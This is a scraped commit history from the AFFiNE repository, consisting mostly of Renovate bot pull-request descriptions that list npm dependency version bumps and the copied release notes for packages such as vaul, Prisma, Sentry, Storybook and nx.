♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC45Ny4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-10-05 14:33:07 +00:00
renovate
a4690b3b9d
chore: bump up vaul version to v1 ( #8406 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [vaul](https://vaul.emilkowal.ski/ ) ([source](https://redirect.github.com/emilkowalski/vaul )) | [`^0.9.1` -> `^1.0.0`](https://renovatebot.com/diffs/npm/vaul/0.9.9/1.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>emilkowalski/vaul (vaul)</summary>
### [`v1.0.0`](https://redirect.github.com/emilkowalski/vaul/releases/tag/v1.0.0 )
[Compare Source](a60e76abee ...v1.0.0)
### New Docs
https://vaul.emilkowal.ski/getting-started
#### What's Changed
- fix: undefined window by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/452 ](https://redirect.github.com/emilkowalski/vaul/pull/452 )
- fix: prevent undefined window by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/453 ](https://redirect.github.com/emilkowalski/vaul/pull/453 )
- feat: documentation by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/454 ](https://redirect.github.com/emilkowalski/vaul/pull/454 )
- feat: Add JSDocs by [@​KajSzy](https://redirect.github.com/KajSzy ) in [https://github.com/emilkowalski/vaul/pull/459 ](https://redirect.github.com/emilkowalski/vaul/pull/459 )
**Full Changelog**: https://github.com/emilkowalski/vaul/compare/v0.9.7...v1.0.0
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC45Ny4wIiwidXBkYXRlZEluVmVyIjoiMzguOTcuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-10-05 14:21:14 +00:00
JimmFly
a3f8e6c852
refactor(core): refactor left sidebar to use di ( #8385 )
2024-09-27 09:32:25 +00:00
renovate
0f9fac420f
chore: bump up all non-major dependencies ( #8376 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://redirect.github.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://redirect.github.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.654.0` -> `3.658.1`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.654.0/3.658.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@faker-js/faker](https://fakerjs.dev ) ([source](https://redirect.github.com/faker-js/faker )) | [`9.0.1` -> `9.0.3`](https://renovatebot.com/diffs/npm/@faker-js%2ffaker/9.0.1/9.0.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@google-cloud/opentelemetry-cloud-monitoring-exporter](https://redirect.github.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`^0.19.0` -> `^0.20.0`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-cloud-monitoring-exporter/0.19.0/0.20.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@google-cloud/opentelemetry-cloud-trace-exporter](https://redirect.github.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`2.3.0` -> `2.4.1`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-cloud-trace-exporter/2.3.0/2.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@google-cloud/opentelemetry-resource-util](https://redirect.github.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`2.3.0` -> `2.4.0`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-resource-util/2.3.0/2.4.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@prisma/client](https://www.prisma.io ) ([source](https://redirect.github.com/prisma/prisma/tree/HEAD/packages/client )) | [`5.19.1` -> `5.20.0`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.19.1/5.20.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@prisma/instrumentation](https://www.prisma.io ) ([source](https://redirect.github.com/prisma/prisma/tree/HEAD/packages/instrumentation )) | [`5.19.1` -> `5.20.0`](https://renovatebot.com/diffs/npm/@prisma%2finstrumentation/5.19.1/5.20.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.31.0` -> `8.32.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.31.0/8.32.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@storybook/addon-essentials](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/essentials ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/essentials )) | [`8.3.2` -> `8.3.3`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.3.2/8.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@storybook/addon-interactions](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/interactions ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/interactions )) | [`8.3.2` -> `8.3.3`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.3.2/8.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@storybook/addon-links](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/links ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/links )) | [`8.3.2` -> `8.3.3`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.3.2/8.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@storybook/addon-mdx-gfm](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/gfm ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/gfm )) | [`8.3.2` -> `8.3.3`](https://renovatebot.com/diffs/npm/@storybook%2faddon-mdx-gfm/8.3.2/8.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@storybook/react](https://redirect.github.com/storybookjs/storybook/tree/next/code/renderers/react ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/renderers/react )) | [`8.3.2` -> `8.3.3`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.3.2/8.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@storybook/react-vite](https://redirect.github.com/storybookjs/storybook/tree/next/code/frameworks/react-vite ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/frameworks/react-vite )) | [`8.3.2` -> `8.3.3`](https://renovatebot.com/diffs/npm/@storybook%2freact-vite/8.3.2/8.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node )) | [`20.16.5` -> `20.16.9`](https://renovatebot.com/diffs/npm/@types%2fnode/20.16.5/20.16.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react )) | [`18.3.8` -> `18.3.9`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.8/18.3.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [builder-util-runtime](https://redirect.github.com/electron-userland/electron-builder ) ([source](https://redirect.github.com/electron-userland/electron-builder/tree/HEAD/packages/builder-util-runtime )) | [`9.2.8` -> `9.2.9`](https://renovatebot.com/diffs/npm/builder-util-runtime/9.2.8/9.2.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [electron-updater](https://redirect.github.com/electron-userland/electron-builder ) ([source](https://redirect.github.com/electron-userland/electron-builder/tree/HEAD/packages/electron-updater )) | [`6.3.7` -> `6.3.8`](https://renovatebot.com/diffs/npm/electron-updater/6.3.7/6.3.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [html-validate](https://html-validate.org ) ([source](https://gitlab.com/html-validate/html-validate )) | [`8.23.0` -> `8.24.0`](https://renovatebot.com/diffs/npm/html-validate/8.23.0/8.24.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [lucide-react](https://lucide.dev ) ([source](https://redirect.github.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.445.0` -> `^0.446.0`](https://renovatebot.com/diffs/npm/lucide-react/0.445.0/0.446.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [nx](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.8.0` -> `19.8.2`](https://renovatebot.com/diffs/npm/nx/19.8.0/19.8.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [openai](https://redirect.github.com/openai/openai-node ) | [`4.63.0` -> `4.65.0`](https://renovatebot.com/diffs/npm/openai/4.63.0/4.65.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [prisma](https://www.prisma.io ) ([source](https://redirect.github.com/prisma/prisma/tree/HEAD/packages/cli )) | [`5.19.1` -> `5.20.0`](https://renovatebot.com/diffs/npm/prisma/5.19.1/5.20.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [react-day-picker](https://daypicker.dev ) ([source](https://redirect.github.com/gpbl/react-day-picker )) | [`9.1.2` -> `9.1.3`](https://renovatebot.com/diffs/npm/react-day-picker/9.1.2/9.1.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [storybook](https://redirect.github.com/storybookjs/storybook/tree/next/code/lib/cli ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/lib/cli )) | [`8.3.2` -> `8.3.3`](https://renovatebot.com/diffs/npm/storybook/8.3.2/8.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [tailwindcss](https://tailwindcss.com ) ([source](https://redirect.github.com/tailwindlabs/tailwindcss )) | [`3.4.12` -> `3.4.13`](https://renovatebot.com/diffs/npm/tailwindcss/3.4.12/3.4.13 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [vaul](https://vaul.emilkowal.ski/ ) ([source](https://redirect.github.com/emilkowalski/vaul )) | [`0.9.4` -> `0.9.9`](https://renovatebot.com/diffs/npm/vaul/0.9.4/0.9.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [vite](https://vitejs.dev ) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite )) | [`5.4.7` -> `5.4.8`](https://renovatebot.com/diffs/npm/vite/5.4.7/5.4.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [webpack](https://redirect.github.com/webpack/webpack ) | [`5.94.0` -> `5.95.0`](https://renovatebot.com/diffs/npm/webpack/5.94.0/5.95.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [wrangler](https://redirect.github.com/cloudflare/workers-sdk ) ([source](https://redirect.github.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.78.7` -> `3.78.10`](https://renovatebot.com/diffs/npm/wrangler/3.78.7/3.78.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.658.1`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36581-2024-09-25 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.658.0...v3.658.1 )
##### Bug Fixes
- **clients:** allow empty string field values for headers ([#​6511](https://redirect.github.com/aws/aws-sdk-js-v3/issues/6511 )) ([1273ff3](1273ff3170 ))
### [`v3.658.0`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36580-2024-09-24 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.657.0...v3.658.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://redirect.github.com/aws-sdk/client-s3 )
### [`v3.657.0`](https://redirect.github.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36570-2024-09-23 )
[Compare Source](https://redirect.github.com/aws/aws-sdk-js-v3/compare/v3.654.0...v3.657.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://redirect.github.com/aws-sdk/client-s3 )
</details>
<details>
<summary>faker-js/faker (@​faker-js/faker)</summary>
### [`v9.0.3`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#903-2024-09-26 )
[Compare Source](https://redirect.github.com/faker-js/faker/compare/v9.0.2...v9.0.3 )
##### Changed Locales
- **locale:** update french legal entity types ([#​3142](https://redirect.github.com/faker-js/faker/issues/3142 )) ([d6bceb6](d6bceb662d ))
##### Bug Fixes
- **image:** fix dataUri with type svg-base64 in browsers ([#​3144](https://redirect.github.com/faker-js/faker/issues/3144 )) ([78b2a3a](78b2a3a8b8 ))
### [`v9.0.2`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#902-2024-09-23 )
[Compare Source](https://redirect.github.com/faker-js/faker/compare/v9.0.1...v9.0.2 )
##### Bug Fixes
- **locale:** improve pt_PT location and person data ([#​3020](https://redirect.github.com/faker-js/faker/issues/3020 )) ([3e47ee7](3e47ee7da6 ))
</details>
<details>
<summary>GoogleCloudPlatform/opentelemetry-operations-js (@​google-cloud/opentelemetry-cloud-monitoring-exporter)</summary>
### [`v0.20.0`](https://redirect.github.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.20.0 )
[Compare Source](https://redirect.github.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.20.0 )
</details>
<details>
<summary>prisma/prisma (@​prisma/client)</summary>
### [`v5.20.0`](https://redirect.github.com/prisma/prisma/releases/tag/5.20.0 )
[Compare Source](https://redirect.github.com/prisma/prisma/compare/5.19.1...5.20.0 )
🌟 **Help us spread the word about Prisma by starring the repo or [posting on X](https://twitter.com/intent/tweet?text=Check%20out%20the%20latest%20@​prisma%20release%20v5.20.0%20%F0%9F%9A%80%0D%0A%0D%0Ahttps://github.com/prisma/prisma/releases/tag/5.20.0 ) about the release.** 🌟
#### Highlights
##### `strictUndefinedChecks` in Preview
With Prisma ORM 5.20.0, the Preview feature `strictUndefinedChecks` will disallow any value that is explicitly `undefined` and will be a runtime error. This change is direct feedback from [this GitHub issue](https://redirect.github.com/prisma/prisma/issues/20169 ) and follows [our latest proposal](https://redirect.github.com/prisma/prisma/issues/20169#issuecomment-2338360300 ) on the same issue.
To demonstrate the change, take the following code snippet:
```tsx
prisma.table.deleteMany({
where: {
// If `nullableThing` is nullish, this query will remove all data.
email: nullableThing?.property,
}
})
```
In Prisma ORM 5.19.0 and below, this could result in unintended behavior. In Prisma ORM 5.20.0, if the `strictUndefinedChecks` Preview feature is enabled, you will get a runtime error instead:
```tsx
Invalid \`prisma.user.findMany()\` invocation in
/client/tests/functional/strictUndefinedChecks/test.ts:0:0
XX })
XX
XX test('throws on undefined input field', async () => {
→ XX const result = prisma.user.deleteMany({
where: {
email: undefined
~~~~~~~~~
}
})
Invalid value for argument \`where\`: explicitly \`undefined\` values are not allowed."
```
We have also introduced the `Prisma.skip` symbol, which will allow you to get the previous behavior if desired.
```tsx
prisma.table.findMany({
where: {
// Use Prisma.skip to skip parts of the query
email: nullableEmail ?? Prisma.skip
}
})
```
From Prisma ORM 5.20.0 onward, we recommend enabling `strictUndefinedChecks`, along with the TypeScript compiler option `exactOptionalPropertyTypes`, which will help catch cases of undefined values at compile time. Together, these two changes will help protect your Prisma queries from potentially destructive behavior.
`strictUndefinedChecks` will be a valid Preview feature for the remainder of Prisma ORM 5. With our next major version, this behavior will become the default and the Preview feature will be “graduated” to Generally Available.
If you have any questions or feedback about `strictUndefinedChecks`, please ask/comment in our dedicated [Preview feature GitHub discussion](https://redirect.github.com/prisma/prisma/discussions/25271 ).
##### `typedSql` bug fix
Thank you to everyone who has tried out our [`typedSql` Preview feature](https://www.prisma.io/blog/announcing-typedsql-make-your-raw-sql-queries-type-safe-with-prisma-orm ) and [provided feedback](https://redirect.github.com/prisma/prisma/discussions/25106 )! This release has a quick fix for typescript files generated when Prisma Schema enums had hyphens.
#### Fixes and improvements
##### Prisma
- [Prisma incorrectly parses CRDB's FK constraint error as `not available`.](https://redirect.github.com/prisma/prisma/issues/24072 )
- [Invalid TypeScript files created by `generate` when typedSql is enabled and enum contains hyphens.](https://redirect.github.com/prisma/prisma/issues/25163 )
- [`@prisma/internals` didn't list `ts-toolbelt` in dependencies.](https://redirect.github.com/prisma/prisma/issues/17952 )
- [using `$extends` prevents model comments from being passed to TypeScript](https://redirect.github.com/prisma/prisma/issues/24648 )
##### Prisma Engines
- [Planetscale engine tests: interactive_tx](https://redirect.github.com/prisma/prisma-engines/issues/4469 )
- [Fix broken engine size publishing workflow](https://redirect.github.com/prisma/prisma-engines/issues/4991 )
#### Credits
Huge thanks to [@​mcuelenaere](https://redirect.github.com/mcuelenaere ), [@​pagewang0](https://redirect.github.com/pagewang0 ), [@​key-moon](https://redirect.github.com/key-moon ), [@​pranayat](https://redirect.github.com/pranayat ), [@​yubrot](https://redirect.github.com/yubrot ), [@​thijmenjk](https://redirect.github.com/thijmenjk ), [@​mydea](https://redirect.github.com/mydea ), [@​HRM](https://redirect.github.com/HRM ), [@​haaawk](https://redirect.github.com/haaawk ), [@​baileywickham](https://redirect.github.com/baileywickham ), [@​brian-dlee](https://redirect.github.com/brian-dlee ), [@​nickcarnival](https://redirect.github.com/nickcarnival ), [@​eruditmorina](https://redirect.github.com/eruditmorina ), [@​nzakas](https://redirect.github.com/nzakas ), and [@​gutyerrez](https://redirect.github.com/gutyerrez ) for helping!
</details>
<details>
<summary>getsentry/sentry-javascript (@​sentry/react)</summary>
### [`v8.32.0`](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/8.32.0 )
[Compare Source](https://redirect.github.com/getsentry/sentry-javascript/compare/8.31.0...8.32.0 )
##### Important Changes
- **ref(browser): Move navigation span descriptions into op ([#​13527](https://redirect.github.com/getsentry/sentry-javascript/pull/13527 ))**
Moves the description of navigation related browser spans into the op, e.g. browser - cache -> browser.cache and sets
the description to the performanceEntry objects' names (in this context it is the URL of the page).
- **feat(node): Add amqplibIntegration ([#​13714](https://redirect.github.com/getsentry/sentry-javascript/pull/13714 ))**
- **feat(nestjs): Add `SentryGlobalGenericFilter` and allow specifying application ref in global filter ([#​13673](https://redirect.github.com/getsentry/sentry-javascript/pull/13673 ))**
Adds a `SentryGlobalGenericFilter` that filters both graphql and http exceptions depending on the context.
- **feat: Set log level for Fetch/XHR breadcrumbs based on status code ([#​13711](https://redirect.github.com/getsentry/sentry-javascript/pull/13711 ))**
Sets log levels in breadcrumbs for 5xx to error and 4xx to warning.
##### Other Changes
- chore(nextjs): Bump rollup to 3.29.5 ([#​13761](https://redirect.github.com/getsentry/sentry-javascript/pull/13761 ))
- fix(core): Remove `sampled` flag from dynamic sampling context in Tracing without Performance mode ([#​13753](https://redirect.github.com/getsentry/sentry-javascript/pull/13753 ))
- fix(node): Ensure node-fetch does not emit spans without tracing ([#​13765](https://redirect.github.com/getsentry/sentry-javascript/pull/13765 ))
- fix(nuxt): Use Nuxt error hooks instead of errorHandler to prevent 500 ([#​13748](https://redirect.github.com/getsentry/sentry-javascript/pull/13748 ))
- fix(test): Unflake LCP test ([#​13741](https://redirect.github.com/getsentry/sentry-javascript/pull/13741 ))
Work in this release was contributed by [@​Zen-cronic](https://redirect.github.com/Zen-cronic ) and [@​Sjoertjuh](https://redirect.github.com/Sjoertjuh ). Thank you for your contributions!
</details>
<details>
<summary>storybookjs/storybook (@​storybook/addon-essentials)</summary>
### [`v8.3.3`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#833 )
[Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v8.3.2...v8.3.3 )
- CLI: Show constraints in error when getting depndencies - [#​29187](https://redirect.github.com/storybookjs/storybook/pull/29187 ), thanks [@​andrasczeh](https://redirect.github.com/andrasczeh )!
- React-Vite: Downgrade react-docgen-typescript plugin - [#​29184](https://redirect.github.com/storybookjs/storybook/pull/29184 ), thanks [@​shilman](https://redirect.github.com/shilman )!
- UI: Fix composed storybook TooltipLinkList bug where href isn't passed forward - [#​29175](https://redirect.github.com/storybookjs/storybook/pull/29175 ), thanks [@​JSMike](https://redirect.github.com/JSMike )!
</details>
<details>
<summary>electron-userland/electron-builder (builder-util-runtime)</summary>
### [`v9.2.9`](https://redirect.github.com/electron-userland/electron-builder/blob/HEAD/packages/builder-util-runtime/CHANGELOG.md#929 )
##### Patch Changes
- [#​8516](https://redirect.github.com/electron-userland/electron-builder/pull/8516 ) [`d1cb6bdb`](d1cb6bdbf8 ) Thanks [@​mmaietta](https://redirect.github.com/mmaietta )! - fix(chore): upgrading typescript and fixing compiler errors
</details>
<details>
<summary>electron-userland/electron-builder (electron-updater)</summary>
### [`v6.3.8`](https://redirect.github.com/electron-userland/electron-builder/blob/HEAD/packages/electron-updater/CHANGELOG.md#638 )
[Compare Source](https://redirect.github.com/electron-userland/electron-builder/compare/electron-updater@6.3.7...electron-updater@6.3.8 )
##### Patch Changes
- [#​8516](https://redirect.github.com/electron-userland/electron-builder/pull/8516 ) [`d1cb6bdb`](d1cb6bdbf8 ) Thanks [@​mmaietta](https://redirect.github.com/mmaietta )! - fix(chore): upgrading typescript and fixing compiler errors
- Updated dependencies \[[`d1cb6bdb`](d1cb6bdbf8 )]:
- builder-util-runtime@9.2.9
</details>
<details>
<summary>html-validate/html-validate (html-validate)</summary>
### [`v8.24.0`](https://gitlab.com/html-validate/html-validate/blob/HEAD/CHANGELOG.md#8240-2024-09-24 )
[Compare Source](https://gitlab.com/html-validate/html-validate/compare/v8.23.0...v8.24.0 )
##### Features
- new `html-validate:browser` configuration preset ([f4e6f5b](f4e6f5ba3b )), closes [#​261](https://gitlab.com/html-validate/html-validate/issues/261 )
</details>
<details>
<summary>lucide-icons/lucide (lucide-react)</summary>
### [`v0.446.0`](https://redirect.github.com/lucide-icons/lucide/releases/tag/0.446.0 ): New icons 0.446.0
[Compare Source](https://redirect.github.com/lucide-icons/lucide/compare/0.445.0...0.446.0 )
#### New icons 🎨
- `file-user` ([#​2457](https://redirect.github.com/lucide-icons/lucide/issues/2457 )) by [@​jguddas](https://redirect.github.com/jguddas )
</details>
<details>
<summary>nrwl/nx (nx)</summary>
### [`v19.8.2`](https://redirect.github.com/nrwl/nx/releases/tag/19.8.2 )
[Compare Source](https://redirect.github.com/nrwl/nx/compare/19.8.1...19.8.2 )
#### 19.8.2 (2024-09-26)
##### 🚀 Features
- **nx-dev:** powerpack landing page ([#​27963](https://redirect.github.com/nrwl/nx/pull/27963 ))
##### 🩹 Fixes
- **core:** hide no file server process json log ([#​27626](https://redirect.github.com/nrwl/nx/pull/27626 ))
- **js:** [@​nx/js](https://redirect.github.com/nx/js ):init ensures tslib is installed if importHelpers is true ([#​28083](https://redirect.github.com/nrwl/nx/pull/28083 ))
- **linter:** add files entry to angular flat config to avoid applying TS rules to JSON files ([#​28102](https://redirect.github.com/nrwl/nx/pull/28102 ))
##### ❤️ Thank You
- Craigory Coppola [@​AgentEnder](https://redirect.github.com/AgentEnder )
